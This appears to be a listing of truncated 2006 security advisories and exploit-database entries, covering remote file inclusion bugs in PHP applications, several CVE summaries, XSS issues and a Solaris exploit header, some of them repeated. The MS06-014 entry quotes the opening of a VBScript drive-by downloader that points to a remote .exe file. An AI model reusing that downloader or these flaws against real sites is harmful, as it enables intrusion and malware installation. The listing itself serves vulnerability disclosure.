myBloggie <= 2.1.3 (mybloggie_root_path) Remote File Inclusion Vulnerability

------------------------------------------------------------------------ ----------------- myBloggie 2.1.3 mybloggierootpath Remote File Inclusion ------------------------------------------------------------------------ ----------------- Author : Sh3ll Date : 2006/04/29 Location : Iran - Tehran...

[Full-disclosure] Latinchat Denial Of Service

Denial Of Service on Chat Magma Latinchat http://www.latinchat.com Researcher: Vicente Perez 1.-Overview Latinchat is one of the most known chat server, and used basically by latin american people. 2.-Description This system has a vulnerabily as DoS, taking system offline by a while. The fail...

CVE-2006-3584

Dynamic variable evaluation vulnerability in index.php in Jetbox CMS 2.1 SR1 allows remote attackers to overwrite configuration variables via URL parameters, which are evaluated as PHP variable variables...

CVE-2006-3584

Dynamic variable evaluation vulnerability in index.php in Jetbox CMS 2.1 SR1 allows remote attackers to overwrite configuration variables via URL parameters, which are evaluated as PHP variable variables...

CVE-2006-3584

CVE-2006-3584 affects Jetbox CMS 2.1 SR1. The vulnerability is in index.php where inputs passed in the URL are evaluated as PHP variable variables, allowing remote attackers to overwrite configuration variables. This is caused by improper handling/sanitization of URL parameters and can lead to di...

CVE-2006-3862

Buffer overflow in IBM Informix Dynamic Server IDS 9.40.TC5 through 9.40.xC7 and 10.00.TC1 through 10.00.xC3 allows attackers to execute arbitrary code via the SQLIDEBUG environment variable envariable...

CVE-2006-3862

Buffer overflow in IBM Informix Dynamic Server IDS 9.40.TC5 through 9.40.xC7 and 10.00.TC1 through 10.00.xC3 allows attackers to execute arbitrary code via the SQLIDEBUG environment variable envariable...

phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability

--------------------------------------------------------------------------------------- phpPrintAnalyzer 1.1 repparrapportracine Remote File Inclusion --------------------------------------------------------------------------------------- Author : Sh3ll Date : 2006/04/27 Location : Iran - Tehran...

PHP Simple Shop 2.0 - abs_path Remote File Inclusion

PHP Simple Shop 2.0 - abspath Remote File Inclusion \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV44$2006 ------------------------------------------------------------------------------ ECHOADV44$2006 PHP Simple Shop = 2.0 abspath Remote File Inclusion...

PHP Live Helper 2.0 - abs_path Remote File Inclusion

PHP Live Helper 2.0 - abspath Remote File Inclusion \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV43$2006 ------------------------------------------------------------------------------ ECHOADV43$2006 PHP Live Helper = 2.0 abspath Remote File Inclusion...

PHP Live Helper <= 2.0 (abs_path) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ===================================================================== PHP Live Helper = 2.0 abspath Remote File Inclusion Vulnerability ===================================================================== \ /\ \ / | \ \ | / \ // / | \ |...

PHP Simple Shop <= 2.0 (abs_path) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ===================================================================== PHP Simple Shop = 2.0 abspath Remote File Inclusion Vulnerability ===================================================================== \ /\ \ / | \ \ | / \ // / | \ |...

vBulletin 3.0.14 ~ init.php~ registerring global arbitary variable~ XSS exploit

ORIGINAL ADVISORY: http://myimei.com/security/2006-07-24/vbulletin-3014-initphp-XSS-exploit.html http://www.kapda.ir/advisory-397.html VENDOR CREDIT: http://www.vbulletin.com/forum/showthread.php?t=194062 ——–Summary——– Software: vBulletin Sowtware’s Web Site: http://www.vBulletin.com Versions:...

PHP Live Helper 2.0 - &#039;abs_path&#039; Remote File Inclusion

\ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV43$2006 ------------------------------------------------------------------------------ ECHOADV43$2006 PHP Live Helper = 2.0 abspath Remote File Inclusion...

guestbook130.txt

--------------------------------------------------------------------------- Guestbook Mambo Module == v1.3.0 Multiple Remote File Include Vulnerabilities --------------------------------------------------------------------------- Author : Matdhule Date : July 27th 2006 Location : Indonesia, Jakar...

MS06014 net horse of a modification of the method-vulnerability warning-the black bar safety net

MS06014 net horse of a modification of the method By the constant QQ: 5 4 5 4 4 4 3 Look at the original code script language="VBScript" on error resume next dl = "http://www.baidu.com/heng.exe" Set df = document. createElement"object" df. setAttribute "classid",...

phpMyAdmin import_blacklist Variable Overwriting

The version of phpMyAdmin installed on the remote host fails to properly protect the global 'importblacklist' variable, which is used in the 'libraries/grabglobals.lib.php' script to protect global variables in its registerglobals emulation layer. An unauthenticated attacker can exploit this flaw...

CVE-2006-3803

Race condition in the JavaScript garbage collection in Mozilla Firefox 1.5 before 1.5.0.5, Thunderbird before 1.5.0.5, and SeaMonkey before 1.0.3 might allow remote attackers to execute arbitrary code by causing the garbage collector to delete a temporary variable while it is still being used...

Solaris 8/9 ps - Environment Variable Information leak

Solaris 8/9 ps - Environment Variable Information leak. CVE-1999-1587. Local exploit for Solaris platform !/bin/sh $Id: raptorucbps,v 1.1 2006/07/26 12:15:42 raptor Exp $ raptorucbps - information leak with Solaris /usr/ucb/ps Copyright c 2006 Marco Ivaldi A security vulnerability in the...

CVE-2006-3848

Cross-site scripting XSS vulnerability in CGI wrapper for IP Calculator IPCalc 0.40 allows remote attackers to inject arbitrary web script or HTML via the URI REQUESTURI environment variable, which is used in the actionurl variable...